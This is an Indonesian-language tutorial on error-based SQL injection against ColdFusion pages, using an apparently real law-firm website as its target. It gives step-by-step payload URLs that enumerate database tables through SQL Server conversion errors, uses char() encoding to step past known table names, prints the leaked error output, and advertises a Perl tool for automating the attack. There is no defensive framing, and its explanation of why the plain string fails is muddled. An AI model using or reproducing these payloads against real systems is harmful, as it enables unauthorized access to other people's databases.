Bermain Sql Injection di target cfm

Kali ini kita coba dengan bermain sql injection pada target .cfm

sample target:
http://www.ekklaw.com/ekklaw.cfm?ID=[sql]

tes vuln:
http://www.ekklaw.com/ekklaw.cfm?ID=7'

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 4: Incorrect syntax near ''.

Jika kita menemukan error seperti di atas berarti kita sudah menemukan 2 kesimpulan.
1. target adalah windows.
2. target mengunakan databases sql server.

Ok, mari kita lanjutkan.


masukan sql injection berikut ini
http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN('')))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value
'REFERENTIAL_CONSTRAINTS' to a column of data type int.


terlihat browser mengeluarkan error yang sangat menakjubkan ;D
dari error di atas kita menemukan sebuah tabel yaitu REFERENTIAL_CONSTRAINTS

lalu bagaimana kita mencari tabel ke 2 dstnya?

kita coba dengan sql berikut:
http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN('REFERENTIAL_CONSTRAINTS')))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'REFERENTIAL_CONSTRAINTS'.

di sini dapat kita lihat bahwa table REFERENTIAL_CONSTRAINTS tidak di temukan. Kenapa?

jawabnya adalah karena REFERENTIAL_CONSTRAINTS string dan server hanya mebaca tabel dalam bentuk ascii.

lalu bagai mana caranya supaya server dapat membaca tabel REFERENTIAL_CONSTRAINTS?

mudah kita convert saja REFERENTIAL_CONSTRAINTS dari string ke ascii

seperti berikut ini:

char(82)%2bchar(69)%2bchar(70)%2bchar(69)%2bchar(82)%2bchar(69)%2bchar(78)%2bchar(84)%2bchar(73)%2bchar(65)%2bchar(76)%2bchar(95)%2bchar(67)%2bchar(79)%2bchar(78)%2bchar(83)%2bchar(84)%2bchar(82)%2bchar(65)%2bchar(73)%2bchar(78)%2bchar(84)%2bchar(83)

ascii diatas jika di string kan adalah REFERENTIAL_CONSTRAINTS.

Mari kita coba dengan memasukan ascii di atas ke dalam sql injection.

http://www.ekklaw.com/ekklaw.cfm?ID=convert(int,(SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.
TABLES%20WHERE%20TABLE_NAME%20NOT%20IN(char(82)%2bchar(69)%2bchar(70)%2bchar(69)%2bchar(82)%2bchar(69)%2bchar(78)%2bchar(84)%2bchar(73)%2bchar(65)%2bchar(76)%2bchar(95)%2bchar(67)%2bchar(79)%2bchar(78)%2bchar(83)%2bchar(84)%2bchar(82)%2bchar(65)%2bchar(73)%2bchar(78)%2bchar(84)%2bchar(83))))--

error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'articles' to a column of data type int.

wow dapat tabel ke 2 selanjutnya anda lanjutkan saja dengan menambah tabel articles yang sudah di konversi ke ascii ke dalam sql injection.

Jika anda berkata lelah itu sudah pasti tapi saya sudah membuat tools mengunakan language perl yang dapat mempermudah anda.

Dengan tools ini ada bisa bermain dengan cfm menjadi sangat mudah.

jika anda sangat membutuhkan tools ini silahkan hubungi irvian.info@gmail.com.